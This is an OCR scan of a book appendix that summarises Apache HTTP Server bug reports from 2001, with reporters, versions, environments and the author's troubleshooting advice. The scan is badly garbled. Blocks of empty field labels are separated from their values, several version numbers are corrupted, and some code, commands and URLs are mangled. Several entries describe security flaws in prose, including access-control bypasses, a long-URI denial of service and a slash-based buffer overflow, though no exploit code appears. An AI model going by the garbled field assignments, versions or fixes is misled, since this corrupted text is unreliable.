Unspecified 


salvo.ciccia@st.com 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 
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Server version: Apache 1.3.12 (Unix) 
HP-UX ctcsf01 B.11.00 U 9000/800 


This is likely a C socket or I/O error (see 

http: //www.cisco.com/univercd/cc/td/doc/product/software/ioss 
390/ios390mu/mucsock.htm for codes). It also occurs on OS2SEM, Tru- 
64, Ingres, Oracle for Unix, and occasionally on Windows (even with 
other network applications, such as qpopper). The Apache team felt that 
the problem was rooted in blocking. Perhaps. Ensure that your TCP/IP is 


correctly configured. 


7184 
http: //bugs.Apache.org/index.cgi/full/7184 


File http: //httpd.Apache.org/dist/binaries/win32/old/ 
Apache_1_3_6 win32.exe is corrupted. 


Apache 

Sat Feb 03 06:40:00 PST 2001 
Sat Feb 03 16:32:04 PST 2001 
pobuda@operamail.com 

1.3.6 

Unspecified 


The Apache team reportedly no longer supports the 1.3.6 installer. 
Upgrade. 


7186 

http: //bugs.Apache.org/index.cgi/full/7186 
Make fails 

Apache 

Sat Feb 03 14:30:00 PST 2001 

Mon Feb 05 13:16:40 PST 2001 
gilles.retiere@free.fr 

1.3.14 

Linux 2.2.14 with gcc 2.95.2 
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Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


The Apache team passed on this one, as the originator was trying 
unsuccessfully to compile in MySQL and php-3.0.18. Because the 
Apache/MySQL/PHP combination is popular, | hunted down the 


problem. In such a build, be sure to specify the -1lmysqlclient option. 


7193 

http: //bugs.Apache.org/index.cgi/full/7193 
MultiViews causes script dump 

Apache 

Mon Feb 05 06:40:01 PST 2001 

Unspecified 

jerry@nitroweb.net 

1.3.14 

FreeBSD 4.2-STABLE 


Here, the originator tried to access his CGI scripts in a URL without 
specifying their extensions (for instance, /latest -news instead of 
/latest -news.cgi). When he ran such scripts with their full name 
(latestnews.cgi), they worked fine. However, when he called them 
without their extension (latest-news), Apache returned script source 


instead. The official response was to remove MultiViews from Options. 


7231 

http: //bugs.Apache.org/index.cgi/full/7231 
Apache .msi installer reports error 2735 

Apache 

Sun Feb 11 18:30:00 PST 2001 

Mon Feb 12 15:41:20 PST 2001 
next.99@xtra.co.nz 

1.3.17-win32-src.msi 

Windows 95, Windows Installer V 1.20 


This happens when you haven't yet installed Winsock or have an out-of- 
date version. Install or upgrade Winsock and if you're not running a 


LAN (that is, if you use a modem to connect), connect to the Net and 


try again. 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 
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7241 
http://bugs.Apache.org/index.cgi/full/7241 
Binary download does not work 

Apache 

Tue Feb 13 12:10:00 PST 2001 

Wed Oct 17 10:56:04 PDT 2001 
jbeau@us.ibm.com 

1.3.17 

AIX 4.3.2 


1.3.17 had several problems on AIX. The solution is to upgrade. 


7242 
http://bugs.Apache.org/index.cgi/full/7242 


file /usr/lib/libthread.so.1: symbol _libc_tsd_common: referenced 


symbol not found 

Apache 

Tue Feb 13 17:50:00 PST 2001 
Unspecified 

tymat@setec.org 

1.3.14 

Solaris 7, gcc 2.8.1 


A rare problem with /usr/lib/libthread.so.1 during make. | found 
no evidence of a fix or further discussion. Hence, | assume it was specific 


to the originator’s machine. 


7246 

http: //bugs.Apache.org/index.cgi/full/7246 
Apache dies with PHP + SSL 

Apache 

Wed Feb 14 07:50:01 PST 2001 

Wed Feb 14 20:08:29 PST 2001 
carsten_burghardt@ibexnet.de 


1.3.17 
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Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Linux RH 6.0, egcs-2.91.66 


The originator found that when he compiled in both PHP and SSL, 
Apache wouldn’t run both but would run either alone without event. 
Apache didn’t have an answer (the support team doesn’t address 
foreign modules) but the problem is pervasive enough that a HOWTO 
now exists that addresses at least part of this problem. Find it at 
http://www. faure.de/Apache+SSL+PHP+fp-howto-1p.html. 


7248 
http: //bugs.Apache.org/index.cgi/full/7248 


Loading shared modules may fail due to unresolved references to 


libgcc.a. 
Apache 
Thu Feb 15 02:50:01 PST 2001 


strube@physik3.gwdg.de 
1.3.17 
Solaris 7, gcc 2.7.2.3 


When using gcc with this version, ensure that in src/Configuration, 
you define LD_SHLIB=gcc and LDFLAGS_SHLIB=- shared. 


7251 

http: //bugs.Apache.org/index.cgi/full/7251 
Running into problems at approximately 232 virtual hosts 
Apache 

Thu Feb 15 10:10:03 PST 2001 

Unspecified 

miceli@buffalo.edu 

1.3.14 

SunOS 5.6, Sun’s cc 


The originator ran into serious resource problems after adding more 
than 232 virtual hosts. The answer is at 
http://httpd.Apache.org/docs/misc/FAQ.html#fdlim. 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 


URL: 
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7300 
http://bugs.Apache.org/index.cgi/full/7300 
Win98 and Apache hang when Win98 goes Standby 
Apache 

Fri Feb 23 03:40:03 PST 2001 

Wed May 30 11:13:34 PDT 2001 
Apache@gustl.net 

3.1.17 

Win98, Win98SE 


When Win98 goes on standby, so does Apache. The quick workaround 
is to disable standby. However, the problem is really a bad interaction 
between PHP and Win98. The originator confirmed this after doing 
some research and finally disabling php4Apache.d1l. The PHP folks are 


aware (the originator’s version was PHP 4.04). 


7323 

http://bugs.Apache.org/index.cgi/full/7323 

Access control ineffective on IPv6/IPv4 mixed environment 
Apache 

Tue Feb 27 03:50:02 PST 2001 

Thu Mar 22 02:05:55 PST 2001 

kabe@sra-tohoku.co.jp 

httpd-2_0_12-alpha 

SunOS 5.8, gcc version 2.95.2 


This bug has security implications and you should obtain the full bug 
report at the preceding URL. Apparently, differences in IPv4 and IPv6 
address structures can break certain Apache access controls. (The 
address capacity of IPv6 represents an expansion from the 32-bit capac- 
ity of IPv4 to 128 bits, a fourfold increase in length and an increase by 2 
to the 96th power in address space.) In the response from Apache, 
there’s a patch. Obtain it at this bug report’s URL. 


7362 


http: //bugs.Apache.org/index.cgi/full/7362 
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Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 


Closed Date: 


Problem building 2.0a9 on Solaris 
Apache 

Tue Mar 06 07:20:01 PST 2001 
Wed Mar 21 22:04:17 PST 2001 
paul.hussein@chase.com 

2.0a9 

SunOS 5.6, gcc 2.7.2.3 


This issue arose from a bug that is now fixed in 2.0. The make would 
die at /dv1/sw/nt/Apache/2.0a9/Apache_2.0a9/srclib, and even 
after augmenting the code (an empty “ALL” in Makefile), the make 
died at /dv1/sw/nt/Apache/2.0a9/Apache_2.0a9/test. The solution is 
to upgrade to 2.0. 


7365 

http: //bugs.Apache.org/index.cgi/full/7365 

Missing headers ap_cache.h and buff.h in proxy module 
Apache 

Tue Mar 06 12:50:01 PST 2001 

Fri Jun 15 15:20:36 PDT 2001 

info. jelmar@telia.com 

2.0a9 

WinNT4 Server with VC++7 


The originator was puzzled when he couldn’t find the proxy header files 
ap_cache.h and buff.h in the proxy module. At the time, Apache 
responded that the proxy module was mangled and had been for some 
time. In a follow-up, Apache responded that the problem had since 


been fixed (and it works now). The solution is to upgrade. 


7368 

http: //bugs.Apache.org/index.cgi/full/7368 
Trouble with dbm_fetch with Apache 

Apache 

Tue Mar 06 15:50:01 PST 2001 


Unspecified 


Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 


Closed Date: 
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patou@sympatico.ca 
Apache_1.3.14 
Red Hat 7.0 kernel 2.2.16-22 i586 


The originator found that when he started Apache (Apachect1 
startssl), Apache would fault and report the following error: Cannot 
load /etc/httpd/modules/mod_rewrite.so: undefined symbol: 
dbm_fetch. The originator then commented out (and therefore didn’t 
load) the rewrite module and received instead a dbm_fetch error for 
mod_auth_dbm. This is substantially the same issue Adam Goodman 
raised in Problem Report 4706 in July 1999. My research suggests that 
this is related to gdbm. If you encounter this problem, try ascertaining 
the libraries that the offending application is linked to—try using nm, for 
example. You may find that the required libraries aren't on your drive 
(or rather, aren’t accessible in the same place they were in the offending 


application’s original build environment). 


7377 
http://bugs.Apache.org/index.cgi/full/7377 
Can't make it 

Apache 

Thu Mar 08 13:10:00 PST 2001 

Wed Mar 21 21:51:07 PST 2001 
Rainer@Dubaschny.de 

13.19 

Linux SuSE 7.1 


The originator’s make failed at mod_rewrite.c:93: 
mod_rewrite.h:135: db1/ndbm.h: file not found. Apache patched 


the problem and if you encounter this, upgrade. 


7387 

http: //bugs.Apache.org/index.cgi/full/7387 
winsock.h is included in service.c 

Apache 

Sun Mar 11 13:50:00 PST 2001 

Wed Mar 21 22:10:29 PST 2001 
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Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


info. jelmar@telia.com 
2.014 
WinNT4 sp6 with VC++7 


This problem is attributable to Microsoft. windows .h includes winsock.h 
before it’s possible to include winsock2.h—an irritating problem that 
causes a fatal make error. As Apache responded, “Microsoft made it 
near impossible to sequence these right.” Although Apache has since 


fixed this problem, the quick workaround looked like this: 


#ifndef WIN32_LEAN AND MEAN 
#define WIN32_LEAN AND MEAN 
#endif 

#ifdef — cplusplus 

extern "C" { 

#endif 

#ifdef — cplusplus 


} 
#endif 


7392 

http: //bugs.Apache.org/index.cgi/full/7392 
Ctrl+Refresh in Internet Explorer 5.5 causes server to crash 
Apache 

Mon Mar 12 04:50:03 PST 2001 

Mon Sep 03 11:59:49 PDT 2001 

Mike@Piff.org.uk 

1.3.19 

Windows 2000 


An interesting little ditty, but not Apache-borne. Reportedly, the origina- 
tor (and others) found that when you pressed Ctrl+Refresh (or even 
simply Refresh) in IE 5.5, it kills the server. This is purportedly tied to a 
flawed Java implementation on the client side. This isn’t Apache's 
responsibility, but it’s interesting nonetheless—and it works. Apache 
administrators using Apache on Win2000 might consider having their 
locked screensaver kick in after 1 minute. Otherwise, bozos walking by 


can down your server with a keystroke. 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 


Arrival Date: 
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7404 
http://bugs.Apache.org/index.cgi/full/7404 
Core dump (Hostname lookup) 

Apache 

Tue Mar 13 20:10:00 PST 2001 

Tue Mar 13 20:46:10 PST 2001 
tanaka@Apache.or.jp 

13.19 

FreeBSD 


This was a core dump on host lookup, a legitimate problem, and one 
for which a patch exists. Grab the fix at this bug report’s URL (if you 
haven’t already upgraded). 


7407 
http: //bugs.Apache.org/index.cgi/full/7407 


[PATCH] access control ineffective on IPv6/IPv4 mixed environment (port 
of PR#7323 for 2.0.14-alpha) 


Apache 

Tue Mar 13 23:20:00 PST 2001 
Thu Mar 22 02:09:55 PST 2001 
kabe@sra-tohoku.co.jp 
2.0.14-alpha 

SunOS 5.8, gcc 2.95.2 


This was an ongoing problem (please see 7323). However, in this 
report, the participants included a quick workaround too lengthy to 
print here. The fix is labeled IPv6-mod_access.patch. If you have these 
problems (and they're bound to crop up more often now), get the 
patch at this bug report’s URL. 


7414 
http://bugs.Apache.org/index.cgi/full/7414 
Web servers will not load modules. 

Apache 

Wed Mar 14 20:20:00 PST 2001 
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Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Unspecified 
pbruce@kpmg.com 

1.3.19 

Solaris 2.8, gcc version 2.95.2 


I'm a big beer fan, as you might know from my online interviews in 
Germany, Brazil, and elsewhere. (I drink Edelweiss, a 500-year-old brew 
from Austria.) The originator related in his discussion the following 
information: “So whoever helps me. | guarantee one way or the other A 
BIG COOL GLASS a BEER is on the house with ME.” Well, Mr. Bruce, 
you're on. Apache didn’t finish its load because your mod_access config 
was mangled. First, note the line #LoadModule access_module 
libexec/mod_access. It seems as if that might be missing something. 
Generally, the problem arises when a) you did this at build time: ' - - 
disable-module=access'; b) you fail to add both the AddModule 
mod_access.c and LoadModule access_module statements; or c) you 
fail to articulate the module’s full name (mod_access, for example). Try 
mod_access.so and when you're done, have that beer. Edelweiss, it’s 
called; you'll find it at any store that sells exotic beers from Europe. Try 
the Dunkel—it’s sweet, creamy, and evidence that 500 years of brewing 


experience amounts to something. Cheers. 


7429 

http: //bugs.Apache.org/index.cgi/full/7429 
Rapid memory leaks leading to kernel panic 
Apache 

Sat Mar 17 15:20:01 PST 2001 

Unspecified 

dgatwood@mklinux.org 

1.3.14 

Linux (MkLinux DR3) and egcs-2.90.25 


The originator found a massive memory leak where Apache would eat 
200+ megabytes over a five-hour period. He therefore wrote a cron 
script to kill and restart Apache every so often. Notably, his config was 
spartan and did not include exotic modules or heavily customized direc- 
tives. Nothing in his report could account for this behavior (and Mr. 


Gatwood is a notable, experienced Linux user on the PowerPC platform, 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 
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not a newbie). Regrettably, | could find no collateral research that 
suggested an answer or even a plausible cause. Perhaps an upgrade will 
help. 


7453 
http: //bugs.Apache.org/index.cgi/full/7453 


HTTPD (1.3.19) server dumps if system is not connected at network 
(TokenRing/Ethernet) 


Apache 

Fri Mar 23 08:30:01 PST 2001 
Fri Mar 23 11:05:32 PST 2001 
servissoglou@de.ibm.com 
1.3.19 

Red Hat 6.2, egcs-2.91.66 


The originator found that when the system wasn’t connected to the 
network, HTTPD died and dumped at ap_get_local_host in 
src/main/util.c. Apache has since patched this problem and the 
patch is at http: //cvs.Apache.org/viewcvs.cgi/Apache - 
1.3/src/main/util.c.diff?r1=1.194&r2=1.195. 


7455 
http: //bugs.Apache.org/index.cgi/full/7455 


Apache overrides rewrite engine directives, automatically returns a PHP 


file even if only its name matches (not its extension) 
Apache 

Fri Mar 23 23:20:00 PST 2001 

Wed Mar 28 15:54:15 PST 2001 
aycan@wowwebdesigns.com 

1153519 

Linux 2.2.16 (Slackware 7.1) 


The originator found that if Apache couldn’t find an exact file match, it 
would return a similarly named file, even if the extension weren't 
correct. The solution is to remove Options -Multiviews from the 


offending or affected directory. 
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Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 


Arrival Date: 


7460 
http://bugs.Apache.org/index.cgi/full/7460 
Segmentation fault on starting 

Apache 

Mon Mar 26 00:30:00 PST 2001 

Mon Mar 26 04:08:17 PST 2001 
kamio@vuni.ne.jp 

1.3.19 

Linux i486 gcc Red Hat 6.0 


The originator found that Apache would seg fault on startup with signal 
11. He ran a back trace indicating a problem with how Apache handled 
the hostname (or reporting that it couldn’t). The patch (if you haven’t 
upgraded) is at http: //cvs.Apache.org/viewcvs.cgi/Apache - 
1.3/src/main/util.c.diff?r1=1.194&r2=1.195. 


7489 

http: //bugs.Apache.org/index.cgi/full/7489 
Compile error 

Apache 

Fri Mar 30 13:10:00 PST 2001 

Sat Mar 31 04:25:59 PST 2001 
dcavanaugh@ucsd. edu 

2.0.15a 

Win2k, 2.0.15a, VC97, Perl, v5.6.0 


This problem has been fixed and is related to Windows SDK security 
descriptors. TRUSTEE_IS_WELL_KNOWN_GROUP must be defined. See the 
full bug report for the patch. 


7497 
http: //bugs.Apache.org/index.cgi/full/7497 


DoS caused by error—Too many open files: Error accepting on cgid 


socket 
Apache 
Sat Mar 31 21:50:00 PST 2001 


Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 
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Sun Apr 01 00:15:49 PST 2001 
d.begley@uws.edu.au 

2.0.15 

Solaris 7, gcc 2.8.1 


After 16 requests (CGI), Apache loops into an error reporting state and 
rapidly fills the disk (via error_log). This was a file descriptor leak and has 


since been fixed. Upgrade. 


7500 

http: //bugs.Apache.org/index.cgi/full/7500 
Potential CGI variable exploit from header canonicalization 
Apache 

Sun Apr 01 13:20:00 PDT 2001 

Unspecified 

kabe@sra-tohoku.co.jp 

2.0.15 

SunOS 5.8, gcc 2.95.2 


The originator reported that for non-[a-zA-Z_] CGI environment vari- 
ables, Apache and perhaps other servers convert such environment 
strings to _, which could produce unexpected results and allow crackers 


to bypass access controls. The full bug report includes a patch. 


7522 
http://bugs.Apache.org/index.cgi/full/7522 
Apache Win32 8,192 string bug 

Apache 

Thu Apr 05 02:10:01 PDT 2001 

Wed May 30 08:00:41 PDT 2001 
kaino3@genie.it 

All prior to 1.3.20 

Windows 9x/NT/2000 


A string of 8,192 chars, sent in a certain way, as a long URI, can disable 
Apache. The problem has since been patched. For more details, see the 


full report. 
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Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 


Closed Date: 


7524 
http://bugs.Apache.org/index.cgi/full/7524 
Doc-Root on Novell Server doesn’t work 

Apache 

Thu Apr 05 07:30:00 PDT 2001 

Sun Apr 15 11:15:13 PDT 2001 
mamier@profidata.de 

1.3.12-1.3.19 

WIN 2000 SP1, Microsoft Client for NetWare 


Mapped drives will not let Apache use DocRoot unless you first alter the 
permissions. Modify the permissions to give the default system user ID 


access and it will work. 


7568 

http: //bugs.Apache.org/index.cgi/full/7568 
Computer restarts after site is hit 

Apache 

Sun Apr 15 20:20:00 PDT 2001 

Wed May 30 10:58:45 PDT 2001 
dannonz@hotmail.com 

1.3.19 

Windows 2000, PHP4 


The originator found an inexplicable problem: When outside users 

(those not on his internal LAN) pulled any Web document on his virtual 
servers (even a directory listing), his machine rebooted. Apache opined 
that this might be related to PHP. | could find no collateral research that 


even remotely suggested a similar problem, nor a fix. 


7595 

http: //bugs.Apache.org/index.cgi/full/7595 
“Sorry, but we cannot grok hp9000_803-hpux10.20” 
Apache 

Fri Apr 20 16:00:01 PDT 2001 


Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 
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wbelvin@blackboard.com 
1:3:9 
Unspecified 


The originator couldn’t get a decent make because Apache didn’t recog- 
nize the platform (in this case, HP-UX). Apache developed a more aware 
GuessOS (originally by Jim Jagielski), which is now at 

http: //cvs.Apache.org/viewcvs.cgi/~checkout~/Apache - 
1.3/src/helpers/GuessOS?rev=1 .74. 


7633 

http: //bugs.Apache.org/index.cgi/full/7633 
httpd executes then exits with no error 

Apache 

Thu Apr 26 08:50:01 PDT 2001 

Unspecified 

andrew@stratus.net 

1.3.19 and 1.3.17 

Linux, gcc version 2.95.3 


The originator reported that when he started Apache, it would die and 
offer (in error_log) the following error: [info] created shared 
memory segment #xxxx. Apache had no answer at the time. However, 
collateral research suggests that this is related to Jserv or servlets use 


and/or modperl. | suggest trying a new compile without either. 


7761 

http: //bugs.Apache.org/index.cgi/full/7761 

Wrong handling of illegal proxy request when proxying is disabled 
Apache 

Mon May 21 17:00:01 PDT 2001 

Unspecified 

ast@domdv.de 

1.3.20 

Linux 2.2.19, gcc 2.95.3 


546 APPENDIX B Apache Security Advisories and Bugs 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 


Arrival Date: 


The originator reported that outside users attempting to use his servers 
as public proxies received 404 errors. He felt that this could degrade 
service and wondered whether this behavior was correct. The official 
response: “In short: if proxy requests are not allowed 403 is the proper 


response to such a request.” 


7772 

http: //bugs.Apache.org/index.cgi/full/7772 
Can't make it 

Apache 

Wed May 23 05:30:01 PDT 2001 

Unspecified 

mpak@ess -web.com 

1.3.20 

Unspecified 

See 7377. 


7790 
http://bugs.Apache.org/index.cgi/full/7790 
SERVICE_CONFIG_DESCRIPTION: undeclared identifier 
Apache 

Wed May 30 03:20:02 PDT 2001 

Mon Sep 24 15:05:01 PDT 2001 

Tobias. Trelle@CyCoSys.com 

1.3.20 

Unspecified 

This is now fixed. Upgrade. 


7805 
http://bugs.Apache.org/index.cgi/full/7805 


Apache cannot be installed on W2k server with the MSI installer 


package 
Apache 
Sat Jun 02 07:40:00 PDT 2001 


Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 
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Thu Aug 30 10:14:58 PDT 2001 
alain@valain.com 

1.3.20 

Unspecified 


The originator had serious problems—as many have had—with the 
Windows MSI installer. Check 

http: //www.Apache.org/dist/httpd/binaries/win32/TROUBLESHOOT - 
ING. html for solutions. 


7867 
http://bugs.Apache.org/index.cgi/full/7867 
htpasswd crypt() encryption broken 

Apache 

Wed Jun 13 17:10:01 PDT 2001 

Wed Jun 13 18:27:37 PDT 2001 
triumph@gankish.net 

1.3219 

Slackware 


The originator found that htpasswd would seg fault when using the 
default crypt function. Slackware’s crypt function (at the time) was 
incompatible with many others and was apparently at least marginally 


broken. The suggested workaround was to install the descrypt package. 


7905 
http: //bugs.Apache.org/index.cgi/full/7905 


http://localhost/ AND http://192.0.0.123/ cannot be accessed at 
local PC and remote PC 


Apache 

Fri Jun 22 01:50:00 PDT 2001 
Fri Jun 22 22:31:53 PDT 2001 
laychengtan@unitest.com.sg 
1.3.19 

Windows 98 

See 7173. 
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Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 


Originator: 


7944 
http://bugs.Apache.org/index.cgi/full/7944 
Security hole for Directory restrictions for Cygwin 1.x 
Apache 

Wed Jun 27 02:40:01 PDT 2001 

Unspecified 

tolj@wapme-systems.de 

1.3.20 

CYGWIN_NT-4.0 WAPME-244 


The originator found that attackers could circumvent directory security 
by using Windows canonical (8.3) filenames. This has since been 


patched. 


7947 

http://bugs.Apache.org/index.cgi/full/7947 
Apache::LogFile with TransferLog and rotatelogs problems 
Apache 

Wed Jun 27 13:20:02 PDT 2001 

benelb@nac.net 

1.3.20 with Mod_Perl 1.25 

SunOS, Mod_Perl 1.25, Perl 5.6.1 


The originator reported that Apache (using Apache: LogFile) was 
dumping access_log and error_log output into the same file. The 
solution was to properly define separate entries for each log, thus differ- 


entiating them. 


7976 
http://bugs.Apache.org/index.cgi/full/7976 
Build error with module php and Idap 

Apache 

Wed Jul 04 04:20:02 PDT 2001 

Unspecified 


brethes@imerir.com 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 


Originator: 
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1.3.20 
Solaris 2.8, PHP 4.0.6, gcc 


The originator tried to compile with php and Idap and the build died at 
ld: fatal: Symbol referencing errors. No output written to 
httpd. Collateral research indicates that you should ensure that bison 
and flex are installed and then try ./configure --prefix=/opt/Apache 
--enable-module=so; make; make install and then ./configure - - 
with-apxs=/opt/Apache/bin/apxs; make; make install. Beyond 
this, you might need to edit your httpd.conf to catch php4 (and 
restart). That should do the trick. 


7981 

http: //bugs.Apache.org/index.cgi/full/7981 

After executing the command ---- ./Apachectl start, httpd fails to 
initialize 

Apache 

Thu Jul 05 00:20:00 PDT 2001 

Unspecified 

bobsonl@is3c.com 

Apache_1.3.9 for hpux10.20 

hpux10.20, gcc 


After trying to start Apache, the originator encountered this error: 
/usr/lib/dld.sl: call tp mmap() failed. This occurs because one 
or more involved libraries have no permissions to perform the desired 
operation. The originator must explicitly provide permissions and 


Apache will start without event. 


7998 
http://bugs.Apache.org/index.cgi/full/7998 
values-Xa.o: No such file or directory 

Apache 

Mon Jul 09 02:20:00 PDT 2001 

Unspecified 


rrajaseh@erggroup.com 
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Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


1.3.20 
Solaris 5.7, GCC ver 2.95 


When the originator tried to compile, he received this error: values - 
Xa.o: No such file or directory. The answer is at 


http://www. sunfreeware.com/faq.html#q5. 


8109 
http://bugs.Apache.org/index.cgi/full/8109 
Internal error 

Apache 

Mon Jul 30 12:30:00 PDT 2001 

Unspecified 

rpina@ctc.cl 

1.3.20-win32 

WinNT 4.0 


The originator tried to install but his install failed on Windows internal 
error #2103. The answer is at 

http: //support.microsoft.com/default.aspx?scid=kb;EN- 

US ;q302472. 


8143 
http: //bugs.Apache.org/index.cgi/full/8143 


When error log reaches Linux’s maximum file size of 2gig, Apache will 


crash. 

Apache 

Sun Aug 05 15:20:00 PDT 2001 
Unspecified 
webmaster@grappone.com 
1.3.19 

Linux 


The originator wrote: “When Apache’s error log hits 2 gigs, it will crash 
when it tries to write to it. And since it can’t write to the error log, 
there’s no way to find out why it crashed.” True enough, which is why 


you should routinely rotate your logs. 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 
Synopsis: 
Responsible: 


Arrival Date: 
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8286 
http: //bugs.Apache.org/index.cgi/full/8286 


Segmentation fault and core dump when using mod_rewrite and 


mod_so 

Apache 

Mon Sep 03 07:30:00 PDT 2001 
Unspecified 
abottoni@quadrante.com 
1.3.20 

Linux 


ezPublish problem. Check 4577, 6204, and 8205. 


8301 

http: //bugs.Apache.org/index.cgi/full/8301 
Cannot start Apache 

Apache 

Wed Sep 05 14:20:00 PDT 2001 

Unspecified 

c-nitin.rahalkar@wcom.com 

Apache_1.3.20 

Slackware, gcc 


The originator performed a make and received this message on startup: 
libc.so.6: version 'GLIBC_2.2' not found. This is not good news, 
because tampering with glibc is a complicated matter. Altering or 
upgrading your libraries can break many things, including vital system 
components. | recommend trying a newer Linux version on a separate 


box with the latest Apache as a test bed. 


8381 

http: //bugs.Apache.org/index.cgi/full/8381 
Startup failure from vanilla installation 

Apache 

Fri Sep 21 05:10:00 PDT 2001 
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Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Number: 
URL: 


Synopsis: 


Responsible: 
Arrival Date: 
Closed Date: 
Originator: 


Release: 


Environment: 


Description: 


Fri Sep 21 10:30:45 PDT 2001 
rwilhm@yahoo.com 

Apache 1.3.20 - Win32 Binary Distribution 
Windows 2000, Service Pack 2 


The originator found that after a clean install, startup failed, with this 
error: WSADuplicateSocket failed for socket 368. The answer is at 
http://httpd.Apache.org/docs/misc/FAQ.html#WSADuplicateSocket. 


8431 
http: //bugs.Apache.org/index.cgi/full/8431 


200 slashes (/) will cause a buffer overflow and give a directory listing 
under Apache win32 


Apache 

Sat Sep 29 14:40:00 PDT 2001 
Mon Oct 01 15:05:17 PDT 2001 
usa2600@yahoo.com 

1.3 win32 

Windows 98 Apache 1.3 


